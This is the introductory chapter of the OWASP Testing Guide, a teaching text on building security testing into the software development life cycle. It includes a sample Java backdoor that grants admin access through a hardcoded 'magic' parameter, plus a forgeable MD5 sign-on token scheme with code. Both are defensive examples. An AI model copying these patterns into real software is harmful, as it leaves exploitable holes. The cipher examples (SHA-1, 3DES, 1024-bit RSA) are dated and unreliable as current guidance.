Most people today don’t test the software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artifacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:SDLC.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 1: Generic SDLC Model'' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. &lt;br /&gt;
&lt;br /&gt;
'''What to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that &amp;quot;create&amp;quot; software, then it is logical that these are the factors that must be tested. Today most people generally test the technology or the software itself. &lt;br /&gt;
&lt;br /&gt;
An effective testing program should have components that test ''People'' – to ensure that there is adequate education and awareness; ''Process'' – to ensure that there are adequate policies and standards and that people know how to follow these policies; ''Technology'' – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at [http://www.fnf.com Fidelity National Financial] presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: &amp;quot;If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.&amp;quot; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Feedback and Comments'''&amp;lt;br&amp;gt;&lt;br /&gt;
As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.&lt;br /&gt;
&lt;br /&gt;
==Principles of Testing==&lt;br /&gt;
&lt;br /&gt;
There are some common misconceptions when developing a testing methodology to weed out security bugs in software. This chapter covers some of the basic principles that should be taken into account by professionals when testing for security bugs in software. &lt;br /&gt;
&lt;br /&gt;
'''There is No Silver Bullet'''&amp;lt;br&amp;gt;&lt;br /&gt;
While it is tempting to think that a security scanner or application firewall will either provide a multitude of defenses or identify a multitude of problems, in reality there are no silver bullets to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments and at providing adequate test coverage. Remember that security is a process, not a product. &lt;br /&gt;
&lt;br /&gt;
'''Think Strategically, Not Tactically'''&amp;lt;br&amp;gt;&lt;br /&gt;
Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. For more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that, given the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. The patch-and-penetrate model also rests on several wrong assumptions: patches can interfere with normal operations and might break existing applications, and not all users will (in the end) be aware of a patch’s availability. Consequently, not all of a product's users will apply patches, either because of this interference or because they lack knowledge of the patch's existence.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:WindowExposure.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 2: Window of Vulnerability''&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
To prevent reoccurring security problems within an application, it is essential to build security into the Software Development Life Cycle (SDLC) by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The SDLC is King'''&amp;lt;br&amp;gt;&lt;br /&gt;
The SDLC is a process that is well-known to developers. Integrating security into each phase of the SDLC allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Test Early and Test Often'''&amp;lt;br&amp;gt;&lt;br /&gt;
When a bug is detected early within the SDLC, it can be addressed more quickly and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA organizations about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages might help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of those that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Scope of Security'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., Confidential, Secret, Top Secret). Discussions should occur with legal counsel to ensure that any specific security need will be met. In the USA these needs might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives might apply. For example, Directive 95/46/EC [10] makes it mandatory to treat personal data in applications with due care, whatever the application. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop the Right Mindset'''&amp;lt;br&amp;gt;&lt;br /&gt;
Successfully testing an application for security vulnerabilities requires thinking &amp;quot;outside of the box.&amp;quot; Normal use cases will test the normal behavior of the application when a user is using it in the manner that you expect. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find what assumptions made by web developers are not always true and how they can be subverted. This is one of the reasons why automated tools are actually bad at automatically testing for vulnerabilities: this creative thinking must be done on a case-by-case basis and most web applications are being developed in a unique way (even if using common frameworks). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Subject'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, and more should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use the Right Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. It is important to understand exactly what these tools can and cannot do, however, so that they are not oversold or used incorrectly. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The Devil is in the Details'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positives that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use Source Code When Available'''&amp;lt;br&amp;gt;&lt;br /&gt;
While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in production, they are not the most effective way to secure an application. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop Metrics'''&amp;lt;br&amp;gt;&lt;br /&gt;
An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. These metrics can show if more education and training are required, if there is a particular security mechanism that is not clearly understood by development, and if the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations might be a good head start.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Document the Test Results'''&amp;lt;br&amp;gt;&lt;br /&gt;
To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they were performed, and details of the test findings. It is wise to agree on an acceptable format for the report that is useful to all concerned parties, who may include developers, project management, business owners, IT department, audit, and compliance. The report must be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report must be clear to the developer in pin-pointing the exact function that is affected by the vulnerability, with associated recommendations for resolution in a language that the developer will understand (no pun intended). Last but not least, the report writing should not be overly burdensome on the security testers themselves; security testers are not generally renowned for their creative writing skills, so agreeing on a complex report can lead to instances where test results do not get properly documented.&lt;br /&gt;
&lt;br /&gt;
==Testing Techniques Explained==&lt;br /&gt;
&lt;br /&gt;
This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques, although Chapter 3 will address this information. This section is included to provide context for the framework presented in the next chapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:&lt;br /&gt;
* Manual Inspections &amp;amp; Reviews &lt;br /&gt;
* Threat Modeling &lt;br /&gt;
* Code Review &lt;br /&gt;
* Penetration Testing &lt;br /&gt;
&lt;br /&gt;
=== Manual Inspections &amp;amp; Reviews ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual inspections are human-driven reviews that typically test the security implications of the people, policies, and processes, but can include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. By asking someone how something works and why it was implemented in a specific way, it allows the tester to quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews we suggest you adopt a trust-but-verify model. Not everything everyone tells you or shows you will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Requires no supporting technology &lt;br /&gt;
* Can be applied to a variety of situations&lt;br /&gt;
* Flexible &lt;br /&gt;
* Promotes teamwork &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Can be time consuming &lt;br /&gt;
* Supporting material not always available &lt;br /&gt;
* Requires significant human thought and skill to be effective!&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Threat modeling has become a popular technique to help system designers think about the security threats that their systems/applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: &lt;br /&gt;
* Decomposing the application – understand, through a process of manual inspection, how the application works, its assets, functionality, and connectivity. &lt;br /&gt;
* Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. &lt;br /&gt;
* Exploring potential vulnerabilities - whether technical, operational, or management. &lt;br /&gt;
* Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees.&lt;br /&gt;
* Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic. &lt;br /&gt;
The output from a threat model itself can vary, but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for testing applications for potential security flaws in their design. There is no right or wrong way to develop threat models and perform information risk assessments on applications [12]. &amp;lt;br&amp;gt;&lt;br /&gt;
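The five steps above can be sketched as a simple data structure for recording threat-model output. This is purely an illustrative sketch; the class and field names (''ThreatModelEntry'', ''highestRisk'') are our own invention and not part of any OWASP or NIST format:

```java
import java.util.List;

// Illustrative record of one threat-model finding, following the five
// steps above. All names here are hypothetical, not a prescribed format.
public class ThreatModelEntry {
    final String asset;            // from "defining and classifying the assets"
    final int businessImportance;  // rank, e.g. 1 (low) to 3 (high)
    final String vulnerability;    // technical, operational, or management
    final String threatScenario;   // attack vector from the attacker's perspective
    final String mitigation;       // mitigating control for a realistic threat

    public ThreatModelEntry(String asset, int businessImportance, String vulnerability,
                            String threatScenario, String mitigation) {
        this.asset = asset;
        this.businessImportance = businessImportance;
        this.vulnerability = vulnerability;
        this.threatScenario = threatScenario;
        this.mitigation = mitigation;
    }

    // Simple triage: direct inevitably limited resources at the
    // highest-ranked asset first, as the text above recommends.
    public static ThreatModelEntry highestRisk(List<ThreatModelEntry> model) {
        return model.stream()
                .max((a, b) -> Integer.compare(a.businessImportance, b.businessImportance))
                .orElse(null);
    }
}
```

Even a minimal structure like this makes the model reviewable as the application evolves, since each entry ties a mitigation back to a concrete asset and scenario.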
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Practical attacker's view of the system &lt;br /&gt;
* Flexible &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Relatively new technique &lt;br /&gt;
* Good threat models don’t automatically mean good software&lt;br /&gt;
&lt;br /&gt;
=== Source Code Review ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Source code review is the process of manually checking a web application's source code for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes “if you want to know what’s really going on, go straight to the source.&amp;quot; Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find implementation issues such as places where input validation was not performed or when fail open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein [13].&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Completeness and effectiveness &lt;br /&gt;
* Accuracy &lt;br /&gt;
* Fast (for competent reviewers) &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Requires highly skilled security developers &lt;br /&gt;
* Can miss issues in compiled libraries &lt;br /&gt;
* Cannot detect run-time errors easily &lt;br /&gt;
* The source code actually deployed might differ from the one being analyzed&lt;br /&gt;
&lt;br /&gt;
'''For more on code review, check out the [[OWASP Code Review Project|OWASP code review project]]'''.&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Penetration Testing ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely, without knowing the inner workings of the application itself, to find security vulnerabilities. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but, again, with the nature of web applications their effectiveness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Can be fast (and therefore cheap) &lt;br /&gt;
* Requires a relatively lower skill-set than source code review &lt;br /&gt;
* Tests the code that is actually being exposed &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Too late in the SDLC &lt;br /&gt;
* Front impact testing only!&lt;br /&gt;
&lt;br /&gt;
=== The Need for a Balanced Approach ===&lt;br /&gt;
With so many techniques and so many approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them.&lt;br /&gt;
Experience shows that there is no right or wrong answer to exactly what techniques should be used to build a testing framework. The fact remains that all techniques should probably be used to ensure that all areas that need to be tested are tested. What is clear, however, is that there is no single technique that effectively covers all security testing that must be performed to ensure that all issues have been addressed. Many companies adopt one approach, which has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested, and is simply “too little too late” in the software development life cycle (SDLC). &lt;br /&gt;
The correct approach is a balanced one that includes several techniques, from manual interviews to technical testing. The balanced approach is sure to cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. &lt;br /&gt;
Of course there are times and circumstances where only one technique is possible; for example, a test on a web application that has already been created, and where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, we encourage the testing parties to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. &lt;br /&gt;
A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. However, it is recommended that a balanced testing framework look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionSDLC.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 3: Proportion of Test Effort in SDLC''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The following figure shows a typical proportional representation overlaid onto testing techniques. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionTest.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 4: Proportion of Test Effort According to Test Technique''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''A Note about Web Application Scanners'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, we want to highlight some fundamental issues about why we do not believe that automating black box testing is (or will ever be) effective. By highlighting these issues, we are not discouraging web application scanner use. Rather, we are saying that their limitations should be understood, and testing frameworks should be planned appropriately.&lt;br /&gt;
NB: OWASP is currently working to develop a web application scanner-benchmarking platform. The following examples indicate why automated black box testing is not effective. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 1: Magic Parameters'''&amp;lt;br&amp;gt;&lt;br /&gt;
Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET request may be: ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=value&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt; To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will be logged in and presented with an administrative screen with total control of the application. The HTTP request is now:&amp;lt;br&amp;gt; ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt;&lt;br /&gt;
Given that all of the other parameters were simple two- and three-character fields, it is not feasible to start guessing a value of approximately 30 characters. A web application scanner would need to brute force (or guess) the entire key space: with 62 possible symbols per position, that is up to 62^30 permutations, or trillions upon trillions of HTTP requests. That is an electron in a digital haystack! &lt;br /&gt;
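Taking the stated alphabet (26 lowercase letters, 26 uppercase letters, and 10 digits, i.e. 62 symbols per position) and the stated 30-character length, the size of the key space can be checked directly. The sketch below is ours, added purely for illustration:

```java
import java.math.BigInteger;

public class Keyspace {
    // a-z, A-Z, and 0-9: 26 + 26 + 10 = 62 possible symbols per position
    static final int ALPHABET_SIZE = 62;
    // stated length of the hidden "magic" value
    static final int VALUE_LENGTH = 30;

    // Total number of candidate values a black-box scanner would
    // have to try in the worst case: 62^30.
    static BigInteger permutations() {
        return BigInteger.valueOf(ALPHABET_SIZE).pow(VALUE_LENGTH);
    }

    public static void main(String[] args) {
        // 62^30 is a 54-digit number, far beyond any scanner's request budget
        System.out.println(permutations());
    }
}
```

At roughly 6 x 10^53 candidates, even a scanner issuing a billion requests per second would need vastly longer than the age of the universe.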
The code for this exemplar Magic Parameter check may look like the following: &amp;lt;br&amp;gt;&lt;br /&gt;
 public void doPost( HttpServletRequest request, HttpServletResponse response) &lt;br /&gt;
 { &lt;br /&gt;
 String magic = &amp;quot;sf8g7sfjdsurtsdieerwqredsgnfg8d&amp;quot;; &lt;br /&gt;
 boolean admin = magic.equals( request.getParameter(&amp;quot;magic&amp;quot;));&lt;br /&gt;
 if (admin) doAdmin( request, response); &lt;br /&gt;
 else …. // normal processing &lt;br /&gt;
 } &lt;br /&gt;
By looking in the code, the vulnerability practically leaps off the page as a potential problem. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 2: Bad Cryptography'''&amp;lt;br&amp;gt;&lt;br /&gt;
Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: ''Hash { username : date }'' &amp;lt;br&amp;gt;&lt;br /&gt;
When a user is passed to site B, the key is sent on the query string to site B in an HTTP redirect. Site B independently computes the hash and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. Clearly, as we explain the scheme, the inadequacies can be worked out, and it can be seen how anyone who figures it out (or is told how it works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as an interview, would have uncovered this security issue quickly, as would inspection of the code. A black-box web application scanner would have seen only a 128-bit hash that changed with each user and, by the nature of hash functions, did not change in any predictable way.&lt;br /&gt;
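The flawed scheme is trivial to reproduce, which is exactly the problem: the token contains no secret, so anyone who knows the recipe can mint a valid key for any username. A minimal sketch of the scheme as described (the class and method names are ours):

```java
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class WeakSsoToken {
    // Reproduces the scheme described above: MD5 of "username:date".
    // There is no secret key, so the hash proves nothing about who computed it.
    public static String token(String username, String date) {
        try {
            MessageDigest md5 = MessageDigest.getInstance("MD5");
            byte[] digest = md5.digest((username + ":" + date)
                    .getBytes(StandardCharsets.UTF_8));
            return String.format("%032x", new BigInteger(1, digest));
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);  // MD5 is in every JRE
        }
    }

    public static void main(String[] args) {
        // An attacker needs only the recipe to forge the 128-bit value
        // site B expects for any account, including a privileged one.
        System.out.println(token("admin", "2009-06-04"));
    }
}
```

A keyed construction such as an HMAC over a server-side secret would at least stop outsiders from forging the token, though the overall single-sign-on design would still warrant review.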
&amp;lt;br&amp;gt;&lt;br /&gt;
'''A Note about Static Source Code Review Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, we want to highlight some fundamental issues about why we do not believe this approach is effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors, however significant manual effort is required to validate the findings. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Requirements Test Derivation==&lt;br /&gt;
If you want to have a successful testing program, you need to know what the objectives of the testing are. These objectives are specified by security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations and positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.&lt;br /&gt;
&lt;br /&gt;
'''Testing Objectives'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the objectives of security testing is to validate that security controls function as expected. This is documented via ''security requirements'' that describe the functionality of the security control. At a high level, this means proving the confidentiality, integrity, and availability of the data as well as the service. The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the [[OWASP Top Ten]], as well as vulnerabilities previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Documentation'''&amp;lt;br&amp;gt;&lt;br /&gt;
The first step in the documentation of security requirements is to understand the ''business requirements''. A business requirement document could provide the initial, high-level information of the expected functionality for the application. For example, the main purpose of an application may be to provide financial services to customers or to allow shopping for and purchasing goods from an on-line catalogue. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.&lt;br /&gt;
&lt;br /&gt;
A general checklist of the applicable regulations, standards, and policies serves the purpose of a preliminary security compliance analysis for web applications well. For example, compliance regulations can be identified by checking information about the business sector and the country/state where the application needs to function/operate. Some of these compliance guidelines and regulations might translate into specific technical requirements for security controls. For example, in the case of financial applications, compliance with the FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security controls and multi-factor authentication. &lt;br /&gt;
&lt;br /&gt;
Applicable industry standards for security also need to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, compliance with the PCI DSS [16] standard forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic stripe data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis.&lt;br /&gt;
&lt;br /&gt;
Another section of the checklist needs to enforce general requirements for compliance with the organization's information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such a requirement can be: &amp;quot;a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.&amp;quot; When security requirements map to compliance rules, a security test can validate the exposure of compliance risks. If violations of information security standards and policies are found, these will result in a risk that can be documented and that the business has to deal with (i.e., manage). For this reason, since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Validation'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the functionality perspective, the validation of security requirements is the main objective of security testing, while, from the risk management perspective, this is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. In more depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personally identifiable information (PII) and sensitive data, the security requirement to be validated is compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization's encryption standards. These might require that only certain algorithms and key lengths be used. For example, a security requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-1, RSA, 3DES) with allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption).&lt;br /&gt;
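A requirement of this kind lends itself to a mechanical check. The following Python sketch is illustrative only (the `ALLOWED` allow-list, the `check_cipher` name, and the minimum key lengths are taken from the example above, not from any real standard):&lt;br /&gt;

```python
# Hypothetical sketch: validate an (algorithm, key length) pair against an
# allow-list policy built from the example in the text. Minimums: 128-bit
# symmetric, 1024-bit asymmetric. Names here are illustrative assumptions.

MIN_KEY_BITS = {"symmetric": 128, "asymmetric": 1024}
ALLOWED = {"3DES": "symmetric", "RSA": "asymmetric"}  # example allow-list

def check_cipher(algorithm, key_bits):
    """Return True if the algorithm is allowed and the key is long enough."""
    kind = ALLOWED.get(algorithm)
    if kind is None:
        return False                      # algorithm not on the allow-list
    return key_bits >= MIN_KEY_BITS[kind]
```

A security test could then walk the deployment configuration and assert `check_cipher` for every cipher suite in use.&lt;br /&gt;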
&lt;br /&gt;
From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing/validation. &lt;br /&gt;
&lt;br /&gt;
